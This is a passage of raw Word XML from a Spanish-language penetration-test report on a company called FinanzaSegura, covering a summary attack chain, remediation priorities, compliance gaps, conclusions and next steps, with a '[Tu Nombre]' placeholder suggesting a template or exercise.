                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQL Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1883F3AE" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Compromiso de red </w:t>
            </w:r>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> MySQL expuesto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19280F90" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Escalada privilegios </w:t>
            </w:r>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> sudo misconfiguration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E9C761" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Persistencia </w:t>
            </w:r>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> SSH con credenciales débiles</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1392935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792AD51B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7B3E539B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>7. RECOMENDACIONES PRIORITARIAS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D52225F" w14:textId="6CB11D1C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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22FD5FCB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ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>🔥</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> ACCIONES INMEDIATAS (24-48 horas):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D50BAF2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━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D20CBB3" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>1. Bloquear puerto 3306 (MySQL) desde Internet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E33808B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>2. Desactivar subdominio test.finanzasegura.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18D751A1" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>3. Cambiar todas las contraseñas comprometidas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17634E27" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>4. Remover privilegios sudo innecesarios de jperez</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B9FEA4" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>5. Implementar WAF básico (CloudFlare/ModSecurity)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156AB691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9EA9C1D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ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> CORTO PLAZO (1-2 semanas):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7873CA4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━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D247D36" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>1. Actualizar OpenSSH, Apache y MySQL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BE42BB3" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>2. Corregir SQL Injection con prepared statements</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B6D5CE1" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>3. Implementar autenticación multifactor (MFA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D90D7F6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>4. Renovar certificado SSL expirado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B9E95C" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>5. Implementar fail2ban y rate limiting</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F3A44F7" w14:textId="77777777" w:rsidR="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:t>6. Auditar logs de acceso para detectar compromisos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="320AA525" w14:textId="77777777" w:rsidR="00EC7D9C" w:rsidRDefault="00EC7D9C" w:rsidP="007C4494"/>
          <w:p w14:paraId="6DF66E0F" w14:textId="77777777" w:rsidR="00EC7D9C" w:rsidRPr="00857C78" w:rsidRDefault="00EC7D9C" w:rsidP="007C4494"/>
          <w:p w14:paraId="097489B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6D38D4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ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>📅</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> MEDIANO PLAZO (1-3 meses):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE033FE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━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10373E2A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00BB23FB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00BB23FB">
              <w:t>1. Implementar política de contraseñas corporativa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32588F26" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00BB23FB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00BB23FB">
              <w:t>2. Capacitación en seguridad para desarrolladores</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A787FFF" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00BB23FB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00BB23FB">
              <w:t>3. Implementar SIEM para monitoreo continuo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD30F49" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00BB23FB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00BB23FB">
              <w:t>4. Pruebas de penetración regulares (trimestre)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFE3F74" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00BB23FB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00BB23FB">
              <w:t>5. Implementar gestión de vulnerabilidades</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D5407A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00BB23FB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00BB23FB">
              <w:t>6. Certificación PCI-DSS si procesa pagos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E173B32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1C46D3D1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438CCEB" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B160C2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>8. MÉTRICAS DE SEGURIDAD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721A44F6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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A3016F6" w14:textId="70E896AC" w:rsidR="00813C8C" w:rsidRPr="007C4494" w:rsidRDefault="00813C8C" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00813C8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B70622C" wp14:editId="4DB9EDE7">
                  <wp:extent cx="4160520" cy="1893147"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1644923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9239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74" cy="189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F81F2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745917E6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00813C8C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>9. CUMPLIMIENTO NORMATIVO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F6BD7B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━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCFD2F4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BDCA81D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ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> PCI-DSS: NO CUMPLE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B2A59B2" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EC7D9C" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EC7D9C">
              <w:t xml:space="preserve">   - Req 6.5.1: SQL Injection no mitigado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62BFD07D" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EC7D9C" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EC7D9C">
              <w:t xml:space="preserve">   - Req 8.2: Contraseñas débiles detectadas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73AE288B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EC7D9C" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EC7D9C">
              <w:t xml:space="preserve">   - Req 11.3: Falta pruebas de penetración regulares</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B56543A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9EA3F77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ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> ISO 27001: NO CUMPLE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A917E96" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EC7D9C" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EC7D9C">
              <w:t xml:space="preserve">   - A.9.4.2: Procedimientos de login inseguros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AB22FD5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EC7D9C" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EC7D9C">
              <w:t xml:space="preserve">   - A.12.6: Gestión de vulnerabilidades deficiente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50E1FB6F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877B13C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ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ley de Protección de Datos: RIESGO ALTO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72D71174" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t xml:space="preserve">   - Exposición de datos personales sensibles</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC573FF" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t xml:space="preserve">   - Falta de cifrado en reposo y tránsito</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14FFC3FF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30ED69E" w14:textId="77777777" w:rsidR="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1247EC23" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2286FBFC" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02DB3FE8" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23FE930D" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E818E8D" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FD2C68E" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B81A9FF" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08F24E44" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="740928C5" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B1C5E09" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EC6A4CD" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="510DA0EE" w14:textId="77777777" w:rsidR="0045797E" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4184D6C2" w14:textId="77777777" w:rsidR="0045797E" w:rsidRPr="007C4494" w:rsidRDefault="0045797E" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5B4C4217" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0045797E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10. CONCLUSIONES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15CA935D" w14:textId="202FA659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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17841547" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t xml:space="preserve">La auditoría reveló un nivel de seguridad CRÍTICO en </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41310B00" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t xml:space="preserve">la infraestructura de FinanzaSegura. El compromiso total </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="117FE069" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t xml:space="preserve">del sistema fue posible en menos de 4 horas, indicando </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D0D4B6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t>múltiples deficiencias graves en controles de seguridad.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="737D4FA3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2965146E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Los principales problemas identificados son:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25CD8F50" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494"/>
          <w:p w14:paraId="59FFB140" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t>1. Falta de hardening básico en servidores</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="413FBF23" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t>2. Software desactualizado con vulnerabilidades conocidas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45948837" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t>3. Configuraciones inseguras en servicios críticos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3A9266" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t>4. Ausencia de políticas de contraseñas robustas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="580F4CE3" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t>5. Falta de segmentación de red</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E0587CA" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="0045797E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="0045797E">
              <w:t>6. Monitoreo y detección de intrusiones inexistente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15373CBB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3219E70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RIESGO EMPRESARIAL:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC7F39F" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>Una brecha de seguridad real podría resultar en:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00D9F8CE" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>- Pérdida estimada: $5-10 millones USD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="452A9961" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>- Robo de datos de 150,000 clientes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4AEDF7" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>- Multas regulatorias: $2-5 millones USD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B97E5DC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>- Daño reputacional irreparable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D5A0D8D" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>- Pérdida de licencias operativas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C6B1F7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BA61F1B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0F042880" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E55CE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>11. PRÓXIMOS PASOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D927A3D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rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6768316D" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494"/>
          <w:p w14:paraId="233D1670" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>1. Reunión ejecutiva para presentar hallazgos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7992997B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>2. Priorización de remediación con CTO/CISO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0816F8E0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>3. Asignación de presupuesto para correcciones</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74566025" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>4. Plan de remediación con cronograma</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B3632E" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>5. Re-test en 60 días para validar correcciones</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF09960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6538E485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52A3AAD7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═══════════════════════════════════════════════════</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BDDE2DA" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A54C2DA" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>EQUIPO DE AUDITORÍA:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C3F032" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>Pentester Senior: [Tu Nombre]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E2A78C" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>Fecha del test: 15-17 Octubre 2025</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D428997" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t>Metodología: OSSTMM v3 + PTES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA536A0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00E55CE0" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00E55CE0">
              <w:t xml:space="preserve">Herramientas: Kali Linux, Nmap, Metasploit, </w:t>
            </w:r>
          </w:p>
